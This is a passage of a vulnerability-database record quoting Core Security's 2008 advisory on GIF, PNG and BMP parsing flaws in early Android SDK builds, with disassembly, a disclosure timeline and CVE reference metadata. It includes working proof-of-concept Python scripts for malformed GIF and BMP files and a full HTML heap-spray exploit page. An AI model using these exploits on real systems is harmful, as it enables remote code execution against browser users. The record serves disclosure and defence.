\u0027GIFImageDecoder::haveDecodedRow() \u0027in the\nopen-source version included by Android in\n\u0027WebKitLib\\WebKit\\WebCore\\platform\\image-decoders\\gif\\GifImageDecoder.cpp\u0027\ninside \u0027webkit-522-android-m3-rc20.tar.gz\u0027 available at [8]. \n\n Detailed analysis:\n\n When the process \u0027com.google.android.browser\u0027 must handle content with\na GIF file it loads a dynamic library called \u0027libsgl.so\u0027 which contains\nthe decoders for multiple image file formats. \n\n Decoding of the GIF image is performed correctly by the library giflib\n4.0 (compiled inside \u0027libsgl.so\u0027). However, the wrapper object\n\u0027GIFImageDecoder\u0027 miscalculates the total size of the image. \n\n First, the Logical Screen Size is read and stored in the following\ncalling sequence (As giflib is an Open Source MIT-licenced library, the\nsource was available for analysis):\n\u0027GIFImageDecoder::onDecode()-\u003eDGifOpen()-\u003eDGifGetScreenDesc()\u0027. The last\nfunction, \u0027DGifGetScreenDesc()\u0027, stores the _Logical Screen Width and\nHeight_ in a structure called \u0027GifFileType\u0027:\n\n/-----------\n\nInt DGifGetScreenDesc(GifFileType * GifFile) {\n... \n/* Put the screen descriptor into the file: */\nif (DGifGetWord(GifFile, \u0026GifFile-\u003eSWidth) == GIF_ERROR ||\nDGifGetWord(GifFile, \u0026GifFile-\u003eSHeight) == GIF_ERROR)\n return GIF_ERROR;\n ... \n }\n- -----------/\n\n We can see that the fields are stored in the first 2 words of the\nstructure:\n\n/-----------\n\ntypedef struct GifFileType {\n/* Screen dimensions. */\nGifWord SWidth, SHeight,\n... \n}\n- -----------/\n\n In the disassembly of the GIFImageDecoder::onDecode() function provided\nbelow we can see how the DGifOpen() function is called and that the\nreturn value (A GifFileType struct) is stored on the $R5 ARM register:\n\n/-----------\n\n.text:0002F234 BL _DGifOpen\n.text:0002F238 SUBS R5, R0, #0 ; GifFile -_ $R5\n- -----------/\n\n Then, the giflib function \u0027DGifSlurp()\u0027 is called and the Image size is\ncorrectly allocated using the Image Width and Height and not the Logical\nScreen Size:\n\n/-----------\n\nInt DGifSlurp(GifFileType * GifFile)\n{ ... ImageSize = sp-\u003eImageDesc.Width * sp-\u003eImageDesc.Height;\n sp-\u003eRasterBits = (unsigned char *)malloc(ImageSize *\nsizeof(GifPixelType));\n ... \n}\n- -----------/\n\n Afterwards the _Logical Screen_ Width and Height are stored in the R9\nand R11 registers:\n\n/-----------\n\n.text:0002F28C LDMIA R5, {R9,R11} ; R9=SWidth R11=SHeight !\n- -----------/\n\n\n\n However the actual image may be much larger that these sizes that are\nincorrectly passed to a number of methods of the \u0027GIFImageDecoder\u0027:\n\n/-----------\n\nImageDecoder::chooseFromOneChoice():\n.text:0002F294 MOV R0, R8\n.text:0002F298 MOV R1, #3\n.text:0002F29C MOV R2, R9\n.text:0002F2A0 MOV R3, R11\n.text:0002F2A4 STR R12, [SP,#0x48+var_3C]\n.text:0002F2A8 BL _ImageDecoder19chooseFromOneChoice;\nImageDecoder::chooseFromOneChoice(SkBitmap::Config,int\n,int)\n\nBitmap::setConfig():\n.text:0002F2B8 MOV R0, R7 ; R7 = SkBitmap\n.text:0002F2BC MOV R1, #3\n.text:0002F2C0 MOV R2, R9 ; R9=SWidth R11=SHeight !\n.text:0002F2C4 MOV R3, R11\n.text:0002F2C8 STR R10, [SP,#0x48+var_48]\n.text:0002F2CC BL _Bitmap9setConfig ;\nBitmap::setConfig(SkBitmap::Config,uint,uint,uint)\n- -----------/\n\n This function stores the SWidth and SHeight inside the Bitmap object as\nshown in the following code snippet:\n\n/-----------\n\n.text:00035C38 MOV R7, R2 ; $R2 = SWidth, goes to $R7\n.text:00035C3C MOV R8, R3 ; $R3 = SHeight, goes to $R8\n.text:00035C40 MOV R4, R0 ; $R4 = *Bitmap\n- -----------/\n\n And later:\n\n/-----------\n\n.text:00035C58 BL _Bitmap15ComputeRowBytes ;\nSkBitmap::ComputeRowBytes(SkBitmap::Config,uint)\n.text:00035C5C MOV R5, R0 ; $R5 = Real Row Bytes\n.text:00035C68 STRH R7, [R4,#0x18] ; *Bitmap+0x18 = SWidth\n.text:00035C6C STRH R8, [R4,#0x1A] ; *Bitmap+0x1A = SHeight\n.text:00035C60 STRH R5, [R4,#0x1C] ; *Bitmap+0x1C = Row Bytes\n- -----------/\n\n The following python script generates a GIF file that causes the\noverflow. It requires the Python Imaging Library. Once generated the GIF\nfile, it must be opened in the Android browser to trigger the overflow:\n\n/-----------\n\n##Android Heap Overflow\n##Ortega Alfredo _ Core Security Exploit Writers Team\n##tested against Android SDK m3-rc37a\n\nimport Image\nimport struct\n\n#Creates a _good_ gif image\nimagename=\u0027overflow.gif\u0027\nstr = \u0027\\x00\\x00\\x00\\x00\u0027*30000\nim = Image.frombuffer(\u0027L\u0027,(len(str),1),str,\u0027raw\u0027,\u0027L\u0027,0,1)\nim.save(imagename,\u0027GIF\u0027)\n\n#Shrink the Logical screen dimension\nSWidth=1\nSHeight=1\n\nimg = open(imagename,\u0027rb\u0027).read()\nimg = img[:6]+struct.pack(\u0027\u003cHH\u0027,SWidth,SHeight)+img[10:]\n\n#Save the _bad_ gif image\nq=open(imagename,\u0027wb=\"\"\u0027)\nq.write(img)\nq.close()\n- -----------/\n\n This security bug affects Android SDK m3-rc37a and earlier versions. \nVersion m5-rc14 of the Android SDK includes a fix and is not vulnerable\nto this bug. \n\n #2 - PNG image parsing, multiple vulnerabilities:\n\n The Portable Network Graphics (PNG) is a bitmapped image format that\nemploys lossless data compression [9]. PNG was created to improve upon\nand replace the GIF format as an image file format that does not require\na patent license. \n\n The library \u0027libsgl.so\u0027 used by Android\u0027s WebKit contains commonly used\ncode to load graphic files, as libpng, giflib and others. The version\ninside libsgl.so distributed with Android SDK m3-rc37a and earlier\nversions include the string \u0027\"libpng version 1.2.8 - December 3, 2004\"\u0027. \nSource code inspection of the file\n\u0027\\WebKitLib\\WebKit\\WebCore\\platform\\image-decoders\\png\\png.c\u0027 included\nin the \u0027webkit-522-android-m3-rc20.tar.gz \u0027 release of the Android\nproject reveals that \u0027\"libpng version 1.2.7 - September\n 12, 2004\"\u0027 has been used in this release. \n\n This old version of libpng makes Android SDK m3-rc37a and earlier\nversions vulnerable to the following known issues: \u0027 CVE-2006-5793,\nCVE-2007-2445, CVE-2007-5267, CVE-2007-5266, CVE-2007-5268,\nCVE-2007-5269 \u0027. \n\nAndroid version m5-rc14 has been updated to include libpng 1.2.24 and is\nlikely not vulnerable. \n\n #3 - BMP image processing, negative offset integer overflow:\n\n The BMP file format, sometimes called bitmap or DIB file format (for\ndevice-independent bitmap), is an image file format used to store bitmap\ndigital images, especially on Microsoft Windows and OS/2 operating\nsystems [10]. \n\n The integer overflow is caused when a Windows Bitmap file (.BMP) header\nis parsed in the method \u0027BMP::readFromStream(Stream *,\n ImageDecoder::Mode)\u0027 inside the \u0027libsgl.so\u0027 library. When the\nvalue of the \u0027offset\u0027 field of the BMP file header is negative and the\nBitmap Information section (DIB header) specifies an image of 8 bits per\npixel (8 bpp) the parser will try to allocate a palette, and will use\nthe negative offset to calculate the size of the palette. \n\n The following code initializes the palette with the color white\n(\u00270x00ffffff\u0027) but with a carefully chosen negative offset it can be\nmade to overwrite any address of the process with that value. Because\nthe BMP decoder source wasn\u0027t released, a disassembly of the binary\nincluded by Android is provided below:\n\n/-----------\n\n.text:0002EE38 MOV LR, R7 ; R7 is the negative offset\n.text:0002EE3C MOV R12, R7,LSL#2\n.text:0002EE40\n.text:0002EE40 loc_2EE40\n.text:0002EE40 LDR R3, [R10,#0x10]\n.text:0002EE44 ADD LR, LR, #1\n.text:0002EE48 MOVL R2, 0xFFFFFFFF\n.text:0002EE4C ADD R1, R12, R3 ; R3 is uninitialized (because of the\nsame bug) but ranges 0x10000-0x20000\n.text:0002EE50 MOV R0, #0\n.text:0002EE54 CMP LR, R9\n.text:0002EE58 STRB R2, [R12,R3] ;Write 0x00ffffff to R12+13 (equals R1)\n.text:0002EE5C STRB R2, [R1,#2]\n.text:0002EE60 STRB R0, [R1,#3]\n.text:0002EE64 STRB R2, [R1,#1]\n.text:0002EE68 ADD R12, R12, #4\n.text:0002EE6C BNE loc_2EE40\n- -----------/\n\n Now, if let\u0027s take a look at the memory map of the Android browser:\n\n/-----------\n\n# ps\nps\nUSER PID PPID VSIZE RSS WCHAN PC NAME\nroot 1 0 248 64 c0084edc 0000ae2c S /init\nroot 2 0 0 0 c0049168 00000000 S kthreadd\n... \nroot 1206 1165 16892 14564 c0084edc 00274af8 S ./gdb\napp_0 1574 535 83564 12832 ffffffff afe0c79c S\ncom.google.android.browser\nroot 1600 587 840 324 00000000 afe0bfbc R ps\n# cat /proc/1574/maps\ncat /proc/1574/maps\n00008000-0000a000 rwxp 00000000 1f:00 514 /system/bin/app_process\n0000a000-00c73000 rwxp 0000a000 00:00 0 [heap]\n08000000-08001000 rw-s 00000000 00:08 344 /dev/zero (deleted)\n... \n#\n- -----------/\n\n We can see that the heap is located in the range \u00270000a000-00c73000\u0027\nand it is executable. Overwriting this area will allow to redirect\nexecution flow if there is a virtual table stored in the heap. Later on\nthe same method we can see that a call to the \"Stream\" Object VT is made:\n\n/-----------\n\n.text:0002EB64 LDR R12, [R8] # R8 is the \"this\" pointer of the Stream Object\n.text:0002EB68 MOV R0, R8\n.text:0002EB6C MOV LR, PC\n.text:0002EB70 LDR PC, [R12,#0x10] # A call is made to Stream+0x10\n- -----------/\n\n Because the \"Stream\" Object (R8) is stored on the heap and we can fill\nthe heap with the white color \u0027\n 0x00ffffff\u0027 we can load the Program Counter with the value at\n\u00270xffffff+0x10\u0027. The following python script will generate a BMP to\naccomplish that:\n\n/-----------\n\n# This script generates a Bitmap file that makes the Android browser\njump to the address at 0xffffff+0x10\n# Must be loaded inside a HTML file with a tag like this: \u0026lt;IMG\nsrc=badbmp.bmp\u0026gt;\n# Alfredo Ortega - Core Security\nimport struct\n\noffset = 0xffef0000\nwidth = 0x0bffff\nheight=8\n\nbmp =\"\\x42\\x4d\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\nbmp+=struct.pack(\"\u003cI\",offset)\nbmp+=\"\\x28\\x00\\x00\\x00\"\nbmp+=struct.pack(\"\u003cI\",width)\nbmp+=struct.pack(\"\u003cI\",height)\nbmp+=\"\\x03\\x00\\x08\\x00\\x00\\x00\"\nbmp+=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\nbmp+=\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x55\\x02\\xff\\x00\\x02\\x00\\x02\\x02\\xff\"\nbmp+=\"\\xff\\x11\\xff\\x33\\xff\\x55\\xff\\x66\\xff\\x77\\xff\\x88\\x41\\x41\\x41\\x41\"\nbmp+=\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"\nbmp+=\"\\x41\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\"\nbmp+=\"\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\\x61\"\nopen(\"badbmp.bmp\",\"wb\").write(bmp)\n- -----------/\n\n Opening the BMP file generated with this script inside a HTML page will\ncause (sometimes, as it is dependent on an uninitialized variable) the\nfollowing output of the gdb debugger:\n\n/-----------\n\n(gdb) attach 1574\nattach 1574\nAttaching to program: /system/bin/app_process, process 1574\n... \n0xafe0d204 in __futex_wait () from /system/lib/libc.so\n(gdb) c\nContinuing. \n\nProgram received signal SIGSEGV, Segmentation fault. \n0x00000000 in ?? ()\n(gdb)\n- -----------/\n\n Here the browser process has jumped to the \u00270x00000000\u0027 address because\nthat is the value at 0x00ffffff+0x10. We can change this value using\ncommon JavaScript heap-filling techniques. \n\n The complete exploit page follows:\n\n/-----------\n\n\u003cHTML\u003e\n\u003cHEAD\u003e\n\u003c/HEAD\u003e\n\u003cBODY\u003e\n\u003cscript type=\"text/javascript\"\u003e\n// Fill 0x200000 - 0xa00000 with Breakpoints\nvar nop = unescape(\"%u0001%uef9f\");\nwhile (nop.length \u003c= 0x100000/2) nop += nop;\nvar i = 0;\nfor (i = 0;i\u003c5;i++)\n document.write(nop)\n\n// Fill 0xa00000 - 0x1100000 with address 0x00400040\nvar nop = unescape(\"%u4000%u4000\");\nwhile (nop.length \u003c= 0x100000/2) nop += nop;\nvar i = 0;\nfor (i = 0;i\u003c2;i++)\n document.write(nop)\n\u003c/script\u003e\n\u003cIMG src=badbmp.bmp\u003e\n\u003c/BODY\u003e\n\u003c/HTML\u003e\n- -----------/\n\n Because the exploit needs to fill over 16 MB of heap memory to reach\nthe address \u00270xffffff\u0027 it is very slow and the default memory\nconfiguration of Android will often abort the process before reaching\nthe desired point. To overcome this limitation for demonstration\npurposes one can launch the emulator with this parameters:\n\n\u0027emulator -qemu -m 192\u0027\n\n That will launch the Android emulator with 192 megabytes of memory,\nplenty for the exploit to work. \n\n This security bug affects Android SDK m5-rc14 and earlier versions. \n\n\n*Report Timeline*\n\n. 2008-01-30: Vendor is notified that possibly exploitable\nvulnerabilities where discovered and that an advisory draft is\navailable. This affects Android SDK m3-rc37a and earlier versions. 2008-01-30: Vendor acknowledges and requests the draft. 2008-01-31: Core sends the draft encrypted, including PoC code to\ngenerate malformed GIF images. 2008-01-31: Vendor acknowledges the draft. 2008-02-02: Vendor notifies that the software is an early release for\nthe open source community, but agree they can fix the problem on the\nestimated date (2008-02-25). 2008-02-04: Core notifies the vendor that Android is using a\nvulnerable PNG processing library. 2008-02-08: Vendor acknowledges, invites Core to send any new\nfindings and asks if all findings will be included in the advisory. 2008-02-12: Core responds to vendor that all security issues found\nwill be included in the advisory, the date is subject to coordination. 2008-02-12: Vendor releases version m5-rc14 of the Android SDK. Core\nreceives no notification. 2008-02-13: Core sends the vendor more malformed images, including\nGIF, PNG and BMP files. Only the BMP file affects the m5-rc14 release. 2008-02-20: Core sends to the vendor a new version of the advisory,\nincluding a BMP PoC that runs arbitrary ARM code and informs the vendor\nthat we noticed that the recent m5-rc14 release fixed the GIF and PNG\nbugs. Publication of CORE-2008-0124 has been re-=scheduled for February\n27th. 2008. 2008-02-21: Vendor confirms that the GIF and PNG fixes have been\nreleased and provides an official statement to the \"Vendor Section\" of\nthe advisory. A final review of the advisory is requested before its\nrelease. The vendor indicates that the Android SDK is still in\ndevelopment and stabilization won\u0027t happen until it gets closer to\nAlpha. Changes to fix the BMP issue are coming soon, priorities are\ngiven to issues listed in the public issue tracking system at\nhttp://code.google.com/p/android/issues . 2008-02-26: Core indicates that publication of CORE-2008-0124 has\nbeen moved to March 3rd 2008, asks if an estimated date for the BMP fix\nis available and if Core should file the reported and any future bugs\nin the public issue tracking page. 2008-02-29: Final draft version of advisory CORE-2008-0124 is sent to\nthe vendor as requested. Core requests for any additional comments or\nstatements to be provided by noon March 3rd, 2008 (UTC-5)\n. 2008-03-01: Vendor requests publication to be delayed one day in\norder to publish a new release of Android with a fix to the BMP issue. 2008-03-02: Core agrees to delay publication for one day. 2008-03-03: Vendor releases Android SDK m5-rc15 which fixes the BMP\nvulnerability. Vendor indicates that Android applications run with\nthe credentials of an unprivileged user which decreases the severity of\nthe issues found\n. 2008-03-04: Further research by Alfredo Ortega reveals that although\nthe vendor statement is correct current versions of Android SDK ship\nwith a passwordless root account. Unprivileged users with shell access\ncan simply use the \u0027su\u0027 program to gain privileges\n. 2008-03-04: Advisory CORE-2008-0124 is published. \n\n\n*References*\n\n[1] Android Overview - Open Handset Alliance -\nhttp://www.openhandsetalliance.com/android_overview.html\n[2] \"Android Comes to Life in Barcelona\" - The Washington Post ,\nFebruary 11th, 2008 -\nhttp://www.washingtonpost.com/wp-dyn/content/article/2008/02/11/AR2008021101944.html\n[3] Android Developer Challenge - http://code.google.com/android/adc.html\n[4] \"Test Center Preview: Inside Google\u0027s Mobile future\" - Inforworld,\nFeb. 27th 2008 -\nhttp://www.infoworld.com/article/08/02/27/09TC-google-android_1.html\n[5] \"\u0027Allo, \u0027allo, Android\" - The Sydney Morning Herald, February 26th,\n2008\nhttp://www.smh.com.au/news/biztech/allo-allo-android/2008/02/26/1203788290737.html\n[6] The Shellcoder\u0027s Handbook: Discovering and Exploiting Security Holes\nby Chris Anley , John Heasman , Felix Linder and Gerardo Richarte. \nWiley; 2nd edition (August 20, 2007) -\nhttp://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html\n[7] Graphics Interchange Format version 89a -\nhttp://www.w3.org/Graphics/GIF/spec-gif89a.txt\n[8] Android downloads page http://code.google.com/p/android/downloads/list\n[9] Portable Network Graphics (PNG) specification -\nhttp://www.w3.org/TR/PNG/\n[10] Bitmap File Structures - http://www.digicamsoft.com/bmp/bmp.html\n\n\n*About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://www.coresecurity.com/corelabs/. \n\n\n*About Core Security Technologies*\n\nCore Security Technologies develops strategic solutions that help\nsecurity-conscious organizations worldwide develop and maintain a\nproactive process for securing their networks. The company\u0027s flagship\nproduct, CORE IMPACT, is the most comprehensive product for performing\nenterprise security assurance testing. CORE IMPACT evaluates network,\nendpoint and end-user vulnerabilities and identifies what resources are\nexposed. It enables organizations to determine if current security\ninvestments are detecting and preventing attacks. Core Security\nTechnologies augments its leading technology solution with world-class\nsecurity consulting services, including penetration testing and software\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\nhttp://www.coresecurity.com. \n\n\n*Disclaimer*\n\nThe contents of this advisory are copyright (c) 2008 Core Security\nTechnologies and (c) 2008 CoreLabs, and may be distributed freely\nprovided that no fee is charged for this distribution and proper credit\nis given. \n\n\n*GPG/PGP Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. \n\n\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.6 (MingW32)\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\n\niD8DBQFHzZRwyNibggitWa0RAjbdAJ9YztTFlDK9a3YOxAx5avoXQV5LhgCeMs6I\nteV3ahcSAUFEtsaRCeXVuN8=\n=u35s\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n", "sources": [ { "db": "NVD", "id": "CVE-2006-5793" }, { "db": "JVNDB", "id": "JVNDB-2006-000961" }, { "db": "BID", "id": "21078" }, { "db": "PACKETSTORM", "id": "52296" }, { "db": "PACKETSTORM", "id": "52280" }, { "db": "PACKETSTORM", "id": "52283" }, { "db": "PACKETSTORM", "id": "52284" }, { "db": "PACKETSTORM", "id": "70792" }, { "db": "PACKETSTORM", "id": "52286" }, { "db": "PACKETSTORM", "id": "64260" }, { "db": "PACKETSTORM", "id": "52285" } ], "trust": 2.61 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2006-5793", "trust": 3.4 }, { "db": "BID", "id": "21078", "trust": 2.7 }, { "db": "SECUNIA", "id": "22900", "trust": 2.4 }, { "db": "SECTRACK", "id": "1017244", "trust": 2.4 }, { "db": "SECUNIA", "id": "22950", "trust": 1.6 }, { "db": "SECUNIA", "id": "22956", "trust": 1.6 }, { "db": "SECUNIA", "id": "23208", "trust": 1.6 }, { "db": "SECUNIA", "id": "25329", "trust": 1.6 }, { "db": "SECUNIA", "id": "22889", "trust": 1.6 }, { "db": "SECUNIA", "id": "23335", "trust": 1.6 }, { "db": "SECUNIA", "id": "22951", "trust": 1.6 }, { "db": "SECUNIA", "id": "25742", "trust": 1.6 }, { "db": "SECUNIA", "id": "29420", "trust": 1.6 }, { "db": "SECUNIA", "id": "22958", "trust": 1.6 }, { "db": "SECUNIA", "id": "22941", "trust": 1.6 }, { "db": "VUPEN", "id": "ADV-2006-4521", "trust": 1.6 }, { "db": "VUPEN", "id": "ADV-2008-0924", "trust": 1.6 }, { "db": "VUPEN", "id": "ADV-2006-4568", "trust": 1.6 }, { "db": "XF", "id": "30290", "trust": 1.4 }, { "db": "USCERT", "id": "TA08-079A", "trust": 0.8 }, { "db": "USCERT", "id": "SA08-079A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2006-000961", "trust": 0.8 }, { "db": "MANDRIVA", "id": "MDKSA-2006:212", "trust": 0.6 }, { "db": "MANDRIVA", "id": "MDKSA-2006:211", "trust": 0.6 }, { "db": "MANDRIVA", "id": "MDKSA-2006:210", "trust": 0.6 }, { "db": "MANDRIVA", "id": "MDKSA-2006:209", "trust": 0.6 }, { "db": "BUGTRAQ", "id": "20080304 CORE-2008-0124: MULTIPLE VULNERABILITIES IN GOOGLE\u0027S ANDROID SDK", "trust": 0.6 }, { "db": "BUGTRAQ", "id": "20061204 RPSA-2006-0211-2 DOXYGEN LIBPNG", "trust": 0.6 }, { "db": "BUGTRAQ", "id": "20061115 RPSA-2006-0211-1 LIBPNG", "trust": 0.6 }, { "db": "OPENPKG", "id": "OPENPKG-SA-2006.036", "trust": 0.6 }, { "db": "UBUNTU", "id": "USN-383-1", "trust": 0.6 }, { "db": "SUSE", "id": "SUSE-SR:2006:028", "trust": 0.6 }, { "db": "TRUSTIX", "id": "2006-0065", "trust": 0.6 }, { "db": "REDHAT", "id": "RHSA-2007:0356", "trust": 0.6 }, { "db": "APPLE", "id": "APPLE-SA-2008-03-18", "trust": 0.6 }, { "db": "GENTOO", "id": "GLSA-200611-09", "trust": 0.6 }, { "db": "SLACKWARE", "id": "SSA:2006-335-03", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-200611-295", "trust": 0.6 }, { "db": "SECUNIA", "id": "32234", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "52296", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "52280", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "52283", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "52284", "trust": 0.1 }, { "db": "JVN", "id": "JVN30732239", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "70792", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "52286", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "64260", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "52285", "trust": 0.1 } ], "sources": [ { "db": "BID", "id": "21078" }, { "db": "JVNDB", "id": "JVNDB-2006-000961" }, { "db": "PACKETSTORM", "id": "52296" }, { "db": "PACKETSTORM", "id": "52280" }, { "db": "PACKETSTORM", "id": "52283" }, { "db": "PACKETSTORM", "id": "52284" }, { "db": "PACKETSTORM", "id": "70792" }, { "db": "PACKETSTORM", "id": "52286" }, { "db": "PACKETSTORM", "id": "64260" }, { "db": "PACKETSTORM", "id": "52285" }, { "db": "CNNVD", "id": "CNNVD-200611-295" }, { "db": "NVD", "id": "CVE-2006-5793" } ] }, "id": "VAR-200611-0210", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.96590906 }, "last_update_date": "2024-07-23T19:44:48.666000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Security Update 2008-002", "trust": 0.8, "url": "http://support.apple.com/kb/ht1249" }, { "title": "Security Update 2008-002", "trust": 0.8, "url": "http://support.apple.com/kb/ht1249?viewlocale=ja_jp" }, { "title": "15 November 2006", "trust": 0.8, "url": "http://libpng.sourceforge.net/libpng-1.2.12-advisory.txt" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.libpng.org/" }, { "title": "1511", "trust": 0.8, "url": "http://www.miraclelinux.com/support/index.php?q=node/99\u0026errata_id=1511" }, { "title": "1023", "trust": 0.8, "url": "http://www.miraclelinux.com/support/index.php?q=node/99\u0026errata_id=1023" }, { "title": "RHSA-2007:0356", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2007-0356.html" }, { "title": "TLSA-2007-45", "trust": 0.8, "url": "http://www.turbolinux.com/security/2007/tlsa-2007-45.txt" }, { "title": "TLSA-2007-49", "trust": 0.8, "url": "http://www.turbolinux.com/security/2007/tlsa-2007-49.txt" }, { "title": "RHSA-2007:0356", "trust": 0.8, "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2007-0356j.html" }, { "title": "TLSA-2007-45", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2007/tlsa-2007-45j.txt" }, { "title": "TLSA-2007-49", "trust": 0.8, "url": "http://www.turbolinux.co.jp/security/2007/tlsa-2007-49j.txt" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2006-000961" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-20", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2006-5793" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.4, "url": "http://www.securityfocus.com/bid/21078" }, { "trust": 2.4, "url": "http://securitytracker.com/id?1017244" }, { "trust": 1.9, "url": "http://bugs.gentoo.org/show_bug.cgi?id=154380" }, { "trust": 1.9, "url": "http://support.avaya.com/elmodocs2/security/asa-2007-254.htm" }, { "trust": 1.9, "url": "https://issues.rpath.com/browse/rpl-790" }, { "trust": 1.7, "url": "http://security.gentoo.org/glsa/glsa-200611-09.xml" }, { "trust": 1.7, "url": "http://www.coresecurity.com/?action=item\u0026id=2148" }, { "trust": 1.6, "url": "http://www.ubuntu.com/usn/usn-383-1" }, { "trust": 1.6, "url": "http://sourceforge.net/project/shownotes.php?release_id=464278" }, { "trust": 1.6, "url": "http://secunia.com/advisories/22958" }, { "trust": 1.6, "url": "http://secunia.com/advisories/22956" }, { "trust": 1.6, "url": "http://secunia.com/advisories/22900" }, { "trust": 1.6, "url": "http://secunia.com/advisories/22889" }, { "trust": 1.6, "url": "http://bugs.gentoo.org/attachment.cgi?id=101400\u0026action=view" }, { "trust": 1.6, "url": "http://www.trustix.org/errata/2006/0065/" }, { "trust": 1.6, "url": "http://secunia.com/advisories/22951" }, { "trust": 1.6, "url": "http://secunia.com/advisories/22950" }, { "trust": 1.6, "url": "http://secunia.com/advisories/22941" }, { "trust": 1.6, "url": "https://issues.rpath.com/browse/rpl-824" }, { "trust": 1.6, "url": "http://www.redhat.com/support/errata/rhsa-2007-0356.html" }, { "trust": 1.6, "url": "http://www.openpkg.com/security/advisories/openpkg-sa-2006.036.html" }, { "trust": 1.6, "url": "http://www.novell.com/linux/security/advisories/2006_28_sr.html" }, { "trust": 1.6, "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:212" }, { "trust": 1.6, "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:211" }, { "trust": 1.6, "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:210" }, { "trust": 1.6, "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:209" }, { "trust": 1.6, "url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026y=2006\u0026m=slackware-security.465035" }, { "trust": 1.6, "url": "http://secunia.com/advisories/29420" }, { "trust": 1.6, "url": "http://secunia.com/advisories/25742" }, { "trust": 1.6, "url": "http://secunia.com/advisories/25329" }, { "trust": 1.6, "url": "http://secunia.com/advisories/23335" }, { "trust": 1.6, "url": "http://secunia.com/advisories/23208" }, { "trust": 1.6, "url": "http://lists.apple.com/archives/security-announce/2008/mar/msg00001.html" }, { "trust": 1.6, "url": "http://docs.info.apple.com/article.html?artnum=307562" }, { "trust": 1.4, "url": "http://www.frsirt.com/english/advisories/2006/4521" }, { "trust": 1.4, "url": "http://xforce.iss.net/xforce/xfdb/30290" }, { "trust": 1.3, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-5793" }, { "trust": 1.0, "url": "http://android-developers.blogspot.com/2008/03/android-sdk-update-m5-rc15-released.html" }, { "trust": 1.0, "url": "http://www.securityfocus.com/archive/1/451874/100/200/threaded" }, { "trust": 1.0, "url": "http://www.securityfocus.com/archive/1/453484/100/100/threaded" }, { "trust": 1.0, "url": "http://www.securityfocus.com/archive/1/489135/100/0/threaded" }, { "trust": 1.0, "url": "http://www.vupen.com/english/advisories/2006/4521" }, { "trust": 1.0, "url": "http://www.vupen.com/english/advisories/2006/4568" }, { "trust": 1.0, "url": "http://www.vupen.com/english/advisories/2008/0924/references" }, { "trust": 1.0, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/30290" }, { "trust": 1.0, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a10324" }, { "trust": 0.8, "url": 